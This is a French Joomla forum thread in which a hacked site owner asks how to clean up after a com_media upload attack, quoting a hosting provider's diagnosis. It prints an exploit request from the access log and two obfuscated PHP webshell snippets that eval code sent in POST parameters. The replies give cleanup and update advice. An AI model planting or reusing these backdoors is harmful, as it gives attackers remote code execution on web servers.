web bloque error 403 probleme avec com_media

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] web bloque error 403 probleme avec com_media

    Bonjour,
    j'ai un site hebergé chez ovh hacké il y a quelques jours. J'ai remonté une sauvegarde saine, mais il est retombé. Ovh me dit dans son diagnostic que des fichiers PHP ont été modifiés pour inclure une entête contenant du code PHP malveillant et joignent une liste impressionante de fichiers en annexe.

    Apparemment la faille viendrait du composant com_media:

    Voici*des*exemples*de*logs*montrant*l'exécution*de *cette*faille.
    175.45.196.212*www.zefoneworld.com***[29/Dec/2014:02:56:55*+0100]*"POST*/administrator/index.php?
    option=com_media&task=file.upload&tmpl=component&1 9c6d76bee7d9d7872a0496c6075b2dd=7173223d0ed51a2d72
    a7262ad30e67df&42844c99d41735816a28ed94c3fd9c7f=1& format=html*HTTP/1.1"*303***
    "http://www.zefoneworld.com/administrator/index.php?option=com_media"*"Mozilla/5.0*(Windows*NT*5.1)*
    AppleWebKit/537.36*(KHTML,*like*Gecko)*Chrome/33.0.1750.154*Safari/537.36"

    Exemple de code malveillant décelé

    <?php
    $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
    $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['ncdd94a'])) {eval($s21(${$s20}['ncdd94a']));}?>

    <?php
    $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q760097'])){eval(${$s20}['q760097']);}?>


    On me dit ensuite;
    Dans*le*but*de*remettre*votre*site*fonctionnel,*il *faudrait*à*votre*niveau*procéder*à*la*suppression *du*code*malveillant*dans*vos*fichiers.

    Je*vous*invite*également*à*placer*un*fichier*.htac cess*dans*le*dossier*wp*content/uploads/*contenant
    les*lignes*ci*dessous:
    <Files**.php>
    Deny*from*all
    </Files>

    Ok pour le fichier .htaccess, mais supprimer le code malveillant dans les fichiers signifie nettoyer les 3 pages de fichiers en annexe, a savoir remplacer les fichiers endommagés par les mêmes mais sains (a savoir une sauvegarde) ou de reinstaller les modules actualisés ?

    Désolé si les questions vous paraissent idiotes, mais je suis un peu nouveau dans tout ça et mes connaissances sont très limitées..

    Merci pour votre aide

  • #2
    Re : web bloque error 403 probleme avec com_media

    Tu as aussi un dossier avec un site WP ?
    Je*vous*invite*également*à*placer*un*fichier*.htac cess*dans*le*dossier*wp*content/uploads/*contenant
    les*lignes*ci*dessous:
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire


    • #3
      Re : web bloque error 403 probleme avec com_media

      wp pour wordpress ? en principe non, ne serait ce pas une erreur d'ovh ??

      Commentaire


      • #4
        Re : web bloque error 403 probleme avec com_media

        En tout cas, ça y ressemble fort, à moins que le piratage ait créé ce dossier !

        Ton problème est que si seuls des fichiers de Joomla! et/ou de ses extensions ont été modifiés, tu peux envisager de les écraser par des versions originales, mais rien ne dit qu'il ne se trouve pas aussi d'autres fichiers ajoutés, qu'il faut alors trouver et supprimer.
        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
        MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

        Commentaire


        • #5
          Re : web bloque error 403 probleme avec com_media

          il doit y avoir d'autres fichiers ajoutés parce que j'ai remonté une sauvegarde saine et il a été bloqué a nouveau le lendemain...

          La solution serait de tout réinstaller actualisé ? Joomla, modules et composants ?

          Commentaire


          • #6
            Re : web bloque error 403 probleme avec com_media

            Bonjour

            L'attaque com_media est ancienne et permet l'upload de fichiers. Quelle est ta version actuelle de Joomla. À priori je dirais que tu un paquet de versions de retard.

            Pour le hack trop tard donc puisqu'il est fait.

            Recherche dans le forum section sécurité, tu trouveras plein de discussions récentes qui vont te donner un coup e pouce pour le nettoyage.

            Bonne journée
            Christophe (cavo789)
            Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
            Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

            Commentaire


            • #7
              Re : web bloque error 403 probleme avec com_media

              Merci RobertG et cavo789 je vais devancer le grand nettoyage de printemps..

              Commentaire

              Annonce

              Réduire
              Aucune annonce pour le moment.

              Partenaire de l'association

              Réduire

              Hébergeur Web PlanetHoster
              Travaille ...
              X